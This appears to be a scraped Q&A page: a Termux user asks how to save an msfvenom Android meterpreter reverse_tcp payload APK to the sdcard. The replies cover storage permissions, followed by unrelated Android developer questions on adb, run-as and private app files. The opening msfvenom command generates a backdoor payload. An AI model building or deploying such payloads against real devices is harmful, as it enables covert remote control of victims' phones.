Quick cyber sec question
Im playing around with metasploit in termux and resolved most issues except for the following:
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=000 R> /$HOME/payload.apk
The above code succesfully compiles the reverse_tcp payload however it is saved to the $HOME directory in termux where it is unusable.
Ive attempted doing R> /sdcard/payload.apk but the directory can not be found.
Changing to: R> /$SDcard/payload.apk throws the following error "Read-only file system" which leads me to believe its either a storage permisson problem or OS limitation as im using Android 5.1.1
Does anyone perhaps know how I can get msfvenom to save payloads to internal storage or sdcard where it can be utilized?
Thanks in advance :)
The termux-tools package, which is pre-installed in the distribution has a command termux-setup-storage which will allow Termux to access your Internal Device Storage.
You can also go to App Info > Permissions & Enable Storage in order to allow Termux to access the Internal Storage of your phone which will no longer give you the "Read Only filesystem" error.
P.S. termux-setup-storage also creates a new directory in $HOME with symlinks to important locations in your Internal Storage such as Downloads, Pictures, Music etc.
i.e. in simple terms,
Run termux-setup-storage.
Allow storage permissions.
You're good to go.
Related
Im running Termux on an Android 10 smartphone. Termux is fully upgraded and updated. But I can't access device storage(/storage/emulated/0).
I tried 'cd' command, and it works. But whenever I try to access a file or folder it says 'no access'. Plz help me.
For accessing to shared storage (/sdcard or /storage/emulated/0), Termux needs a storage access permission. It is not granted by default and is not requested on application startup because it is not necessary for normal applications.
In order to have access you should run
termux-setup-storage
command. Then you can have access to various paths like :
~/storage/shared : this is the root of shared storage
~/storage/downloads : this is the common folder for downloads
~/storage/dcim : this is normal directory for pictures and vidoes captured by camera
First you need to setup your phone internal storage in termux, using this command *
termux-setup-storage
*Then put this command to change your directory *
cd /sdcard
*Now you can easily access your internal storage *
I'm trying to move all sub-folder of a folder on my desktop to the 'files' folder in the internal app storage of the app I developed.
My first attempt with one file:
/e/Android/android-sdk/platform-tools
$ adb push pull.sh /data/data/irisrecognition.example.com.irisrecognition
failed to copy 'pull.sh' to 'C:/Program Files/Git/data/data/irisrecognition.example.com.irisrecognition': No such file or directory
26 KB/s (315 bytes in 0.011s)
Why does the GIT path gets added to my data path? I also tried using adb shell, run-as etc to no avail.
Here is what worked for our App:
Ensure the device is connected.
Open a console.
Finally, run something like:
adb push C:\my-location\my-data\. /storage/emulated/0/Android/data/my.package.name
But edit above's paths to your requirements (specially the "my.package.name" part).
Note that the "." dot means current-directory, but by putting "C:\my-location\data\" in front of it, we mark that path to be current.
Also, the destination-directrory is auto created (if it does not already exist).
You can't simply push or pull files into or from the internal storage of an app. If it would have been possible, any 3rd party app could fetch or inject data into an app's private storage space.
If you really want to do this, you need to have root access.
I have been reading some stuff about the new external SD security rules that were introduced in KitKat 4.4, and still can't figure why exactly can't a system application still delete files from the external card (yes, even files that aren't mine, but am I a system app or not)?
The device is rooted. Deleting files using adb shell works. From my application, however - it doesn't work (only on the external storage).
Another try I had was to execute "su" from my application, but I am getting: su: uid 1000 not allowed to su.
Any ideas anyone?
HI I am developing an android application for android on nexus 7 device.
I am trying to copy my database.db from assets to /data/data/myPackage/databases/ folder. Nothing wrong till here. No exceptions and everything runs smoothly.
But When i try to get into /data/data/ folder through adb shell or with file explorer it says permission denied or just doesnt show anything.
Am I missing something here ?
PS: myPackage is just symbolic i have my own package name in its stead
Command line is here
shell#tilapia:/ $ cd /data/
shell#tilapia:/data $ ls
opendir failed, Permission denied
You need to have your device rooted to be able to access that folder.
If you want to look at your database you can always export it to the sdcard and look at it there.
see this link for an example on how to do that
trying to export db to SDCARD
you can always get the db out of the emulator, but never from a live device or else it would be easy to write apps that read/write other apps' databases and create malware
I have an xml file being written by an app that is set to MODE_PRIVATE, but I now want to read that file outside of the phone, for debugging purposes. In Eclipse, I can access other files made by the app and copy them to my computer, but I can't even see this private file. Merely changing the file to MODE_WORLD_READABLE file doesn't seem to help. I think the file is being stored on an internal "SD card" that can not be removed from the phone, but there are also two other folders in the File Explorer that are either empty or inaccessible: asec and secure.
Does anyone know how the file can be accessed?
If your app is installed in debug mode, you can get your private files on a device without rooting.
Go to [android-sdk]/platform-tools folder and run adb shell.
run-as com.example.yourapp
cp -r /data/data/com.example.yourapp /sdcard/
(Where com.example.yourapp is the package name of your application.)
After executing the steps above, the private folder of your application is copied into the root of your sdcard storage, under your package name, where you have permission to download and view them.
Note 1: If you don't need to download them, then instead of step 3, you can use unix commands to navigate around and list files and folders.
Note 2: Starting from Android Studio 2.0, you'll find more files in the cache and files/instant-run folder, related to the Instant Run and the GPU Debugger features, placed there by the IDE.
You will need to connect the phone and do some magic to let your sdk work with it (I think put it in debugging mode?). Go to where you unzipped the android sdk:
C:\android-sdk_r10-windows\android-sdk-windows\platform-tools>adb shell
#cd data/data/com.yourpackage.yourapp/files
#ls
You should see your file listed. You may need to run "ls data/data" if you're not sure what the fully-qualified name of your app is. From here if the file is small and you just want to see what's inside it you can run:
#cat yourfilename.xml
Alternatively:
#exit
C:\android-sdk_r10-windows\android-sdk-windows\platform-tools>adb pull /data/data/com.yourpackage.yourapp/files/yourfile.xml
Note: I have only tried this on the emulator, I don't know how to use adb with a physical phone.
You need to root your phone to see Context.MODE_PRIVATE files
It ends up being stored in data//files I believe but you need root permission to see them
So either root your phone or wait until you finished debugging and then add Context.MODE_PRIVATE
If Eclipse is used, there is one more option:
DDMS Perspective > File Explorer tab > data/data/com.yourpackage.yourapp/files
where you can pull/push/delete files.
Another option is to have a command in the app that dumps the private files. This only works if you don't want to edit the files, but has the added bonus that you don't have to strip it out before it goes to production, because the user can't break anything with it. Well, as long as the files don't contain sensitive information. But, really, if they do, you're doing something wrong. As #user1778055 said, a user can root their phone to access it.